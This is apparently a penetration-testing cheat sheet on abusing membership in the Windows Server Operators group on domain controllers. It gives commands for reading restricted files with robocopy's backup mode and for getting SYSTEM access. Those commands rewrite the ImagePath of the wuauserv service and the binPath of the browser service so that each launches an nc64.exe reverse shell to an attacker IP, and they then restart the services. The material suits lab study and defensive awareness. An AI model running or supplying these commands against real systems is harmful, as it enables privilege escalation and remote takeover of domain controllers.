Server Operators

Information

Server Operators exists only on DCs and are used for managing the DC as a whole, including service configurations and files. They can create and delete network shared resources, start and stop services, back up and restore files, and change installed binaries on the DCs. This group is considered a service administrator account because its members have physical access to DCs.

Well-known SID/RID: S-1-5-32-549.

Privileges	Description
SeBackupPrivilege	Allows us to create backups of any files, whilst not restoring their permissions, which equals to arbitrary read access.
SeRestorePrivilege	Allows us to overwrite legitimate executable files with versions that include malicious software used for privilege escalation.

Exploitation

Accessing Files

# copy "restricted" data
robocopy /b C:\users\administrator\desktop C:\programdata\temp

For an example of the above method check here.

ImagePath

Member of this group has the ability to manage services. By modifying the ImagePath of a service we can gain SYSTEM level access.

# change ImagePath
reg add "HKLM\System\CurrentControlSet\services\wuauserv" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\System32\spool\drivers\color\nc64.exe -e powershell.exe 10.10.14.6 1337" /f
# confirm change
reg query "HKLM\System\CurrentControlSet\services\wuauserv"
# start service
Start-Service wuauserv

For an example of the above method check here.

binPath

Similar to ImagePath, we can change the binPath.

# change binPath
sc.exe config browser binPath= "C:\programdata\nc64.exe -e cmd.exe 10.10.14.19 443"
# stop the service
sc.exe stop browser
# start the service
sc.exe start browser

Resources

First Tab

Active Directory Security GroupsMicrosoftLearn

Exploitation